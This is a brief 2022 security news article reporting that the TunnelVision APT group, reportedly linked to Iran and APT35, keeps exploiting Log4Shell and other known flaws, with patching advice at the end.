The TunnelVision APT group still exploits Log4Shell in attacks

March 2, 2022
Tunnel Vision APT Threat Group Vulnerability Exploit Log4Shell Cyberattacks

The TunnelVision advanced persistent threat (APT) group continually exploited the Log4j critical flaw to launch their ransomware despite security solutions already releasing the patches for the vulnerability. The researchers claimed that the APT group relates to the Iranian government to target unpatched VMware Horizon servers.

The TunnelVision APT activities were discovered exploiting one-day flaws in their recent attacks, such as Exchange ProxyShell, and CVE-2018-13379 for FortiOS. It also abuses the Log4Shell critical vulnerability in VMware Horizon to run PowerShell commands that send outputs back to its operators using webhook.

These PowerShell commands download tools such as Ngrok to ensure the ransomware’s success. The PowerShell also develops reverse shells and launches a particular backdoor to gather credentials and establish lateral movements inside the infected device.

The researchers also stressed that most of the APT group’s attacks used Fast Reverse Proxy Client “FRPC” and Plink Tools.

 

The TunnelVision APT group may be affiliated with another advanced persistent threat group known as APT35.

 

Based on recent analysis, TunnelVision’s tricks, techniques, and procedures (TTPs) overlap with the Iranian-linked state-sponsored threat group called APT35. The APT35 is also known for its famous names such as Nemesis Kitten, Phosphorus, and Charming Kitten.

Furthermore, the researchers said that the backdoor deploys an executable with an obfuscated version of a reverse shell identical to the PowerLess backdoor used by APT35 in a recent chain of ransomware campaigns.

Experts claim that the APT35 group has abused a GitHub repository (VmWareHorizon) connected with an account called protections20, in which state-sponsored threat actors operate.

The TunnelVision APT group abuses several flaws and is tracked by other security vendors using several names. Thus, experts urge organisations to share their knowledge regarding the threat group and take advantage of given IOCs.

Organisations should also ensure that the software and operating systems are not outdated and patched with the latest fixes.

About the author

Leave a Reply